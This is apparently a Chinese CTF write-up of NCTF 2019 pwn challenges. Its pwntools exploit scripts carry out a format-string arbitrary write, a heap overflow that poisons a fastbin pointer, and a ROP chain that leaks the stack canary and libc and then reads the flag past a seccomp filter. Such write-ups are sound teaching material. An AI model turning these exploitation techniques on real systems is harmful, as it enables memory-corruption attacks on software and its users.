Nctf2019 pwn

没啥好说的自己菜
就做了三个

hello_pwn

没啥好说了直接连

from pwn import *
local=1
p=remote('139.129.76.65',50003)
p.interactive()

pwn me 100 years! (Ⅰ)

00截断然后直接覆盖

from pwn import *
p=remote('139.129.76.65',50004)
#p=process('./pwn_me_1')
payload='yes'.ljust(0x10,'\x00')
payload+='ffff'
p.sendline(payload)
p.interactive()

pwn me 100 years! (Ⅱ)

学习到了大师傅们的写入原来是不管\x00截断的我们需要注意的只有偏移和格式化字符串的位置，然后之后还是可以分位置写入的

from pwn import *
p=process('./pwn_me_2')
elf=ELF('./pwn_me_2')
offset=6
p.recvuntil('name:')
p.send('%p'*24)
base=int(p.recvuntil('d30')[-14:],16)-0xd30
flag_addr=base+0x2020E0
log.success('base: '+hex(base))
log.success('flag_addr: '+hex(flag_addr))
p.recvuntil('want?')
payload='%'+str(0x6666)+'d%10$hn%11$hn'
payload=payload.ljust(0x20,'\x00')
payload+=p64(flag_addr)+p64(flag_addr+2)
p.send(payload)
p.interactive()
print payload

pwn me 100 years! (Ⅲ)

很简单的堆题程序先申请了一个堆块只要数字等于0x66666666就会给你shell edit函数有溢出直接覆写size位然后free ,add将下一个chunk的fd写成首块chunk,add2次写入即可

from pwn import *
local=1
if local==1:
	p=process('./pwn_me_3')
	elf=ELF('./pwn_me_3')
else:
	p=remote('1',1)
	elf=ELF('./pwn_me_3')

def add(size,content):
	p.recvuntil('5,exit')
	p.sendline('1')
	p.sendlineafter('size:',str(size))
	p.sendafter('content:',content)

def delete(idx):
	p.recvuntil('5,exit')
	p.sendline('2')
	p.sendlineafter('idx:',str(idx))

def show(idx):
	p.recvuntil('5,exit')
	p.sendline('3')
	p.sendlineafter('idx:',str(idx))

def edit(idx,content):
	p.recvuntil('5,exit')
	p.sendline('4')
	p.sendlineafter('idx:',str(idx))
	p.send(content)

def exp():
	#gdb.attach(p,'b *0x0400B93')
	add(0x18,'aaaa')  #idx 0
	add(0x10,'bbbb') #idx 1
	add(0x10,'cccc') #idx 2
	add(0x10,'dddd') #idx 3
	delete(3)
	delete(2)
	edit(0,'a'*0x18+p64(0x41))
	delete(1)
	add(0x30,'\x00'*24+p64(0x21)+p8(0))
	#add(0x30,'aaaa')
	add(0x10,'a')
	add(0x10,p64(0x66666666))
	#gdb.attach(p,'b *0x0400C2A')
	#show(0)
	p.interactive()

if __name__=="__main__":
	exp()

warmup

开了沙箱过滤了execve直接读呗…

from pwn import *
from LibcSearcher import *
local=0
if local==1:
	p=process('./warm_up')
	elf=ELF('./warm_up')
	libc=ELF('./libc6_2.23-0ubuntu10_amd64.so')
else:
	p=remote('139.129.76.65',50007)
	elf=ELF('./warm_up')
	libc=ELF('./libc-2.23.so')
pop_rdi=0x000400bc3
pop_rsi_r15=0x000400bc1
flag_addr=0x6010b0
def su(address):
	log.success('address :'+hex(address))
def exp():
	p.recvuntil('!!!')
	p.sendline(0x18*'a')
	p.recvuntil('aaaaa\n')
	canary=u64(p.recv(7).rjust(8,'\x00'))
	log.success('canary: '+hex(canary))
	pd='a'*0x18+p64(canary)+p64(0)+p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x00400AB6)
	p.recvuntil(' ?')
	p.sendline(pd)
	put_addr=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
	log.success('put_addr: '+hex(put_addr))
	libcbase=put_addr-libc.symbols['puts']
	open_addr=libcbase+0x0F7049
	log.success('open_addr: '+hex(open_addr))
	write_addr=libcbase+0x00F72B0
	read_addr=libcbase+0x0F7250
	pop_rdx=libcbase+0x00001b92
	pop_rsi=libcbase+0x0202e8
	p.recvuntil('!!!')
	p.sendline('binbin')
	payload='a'*0x18+p64(canary)+p64(0)+p64(pop_rdi)+p64(0)+p64(pop_rsi_r15)+p64(flag_addr)+p64(0x8)+p64(elf.symbols['read'])
	payload+=p64(pop_rdi)+p64(flag_addr)+p64(pop_rsi)+p64(0)+p64(open_addr)+p64(pop_rdi)+p64(3)
	payload+=p64(pop_rsi)+p64(flag_addr)+p64(pop_rdx)+p64(0x100)+p64(read_addr)+p64(pop_rdi)+p64(1)+p64(pop_rsi)+p64(flag_addr)
	payload+=p64(pop_rdx)+p64(0x100)+p64(write_addr)
	p.recvuntil(' ?')
	p.send(payload)
	sleep(1)
	p.send('flag')
	p.send('\n')
	p.interactive()
if __name__=="__main__":
	exp()

后面的easy_rop,easy_heap没看了